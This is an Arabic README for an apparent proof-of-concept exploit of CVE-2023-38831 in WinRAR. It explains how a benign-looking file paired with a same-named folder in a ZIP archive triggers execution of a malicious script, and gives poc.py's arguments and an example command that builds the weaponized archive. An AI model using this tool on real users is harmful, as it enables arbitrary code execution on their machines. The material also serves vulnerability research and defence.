
إثبات المفهوم لثغرة CVE-2023-38831 من نوع Zero-Day في برنامج WinRAR
هذا المستودع هو مجرد إثبات مفهوم لثغرة CVE-2023-38831 من فئة Zero-Day في WinRAR
يسمح WinRAR من RARLabs قبل الإصدار 6.23 للمهاجمين بتنفيذ تعليمات برمجية عشوائية عندما يحاول المستخدم عرض ملف غير ضار داخل أرشيف ZIP. تحدث المشكلة لأن أرشيف ZIP قد يتضمن ملفًا غير ضار (مثل ملف .JPG عادي) ومجلدًا له نفس اسم الملف غير الضار، وتتم معالجة محتويات المجلد (التي قد تتضمن محتوى قابلًا للتنفيذ) أثناء محاولة الوصول إلى الملف غير الضار فقط. تم استغلال هذه الثغرة في البرية من أبريل حتى أغسطس 2023
Usage:
- poc.py [-h] scriptPath benignPath zipDirectory fname
CVE-2023-38831 Zero-Day Vulnerability in WinRAR - PoC
positional arguments:
scriptPath The Filepath of the Malicious script/batch which will be executed
benignPath The Filepath of the Benign file (recommended in '.jpg', '.png' and '.pdf')
zipDirectory The Name of the Directory which will be Created and Zipped
fname The Names of the Folder and File in the Zip (including the file extension)
options:
-h, --help show this help message and exit
python3 poc.py script.bat sample.PNG PoC sample.png لإنشاء الاستغلال بصيغة .zip

https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/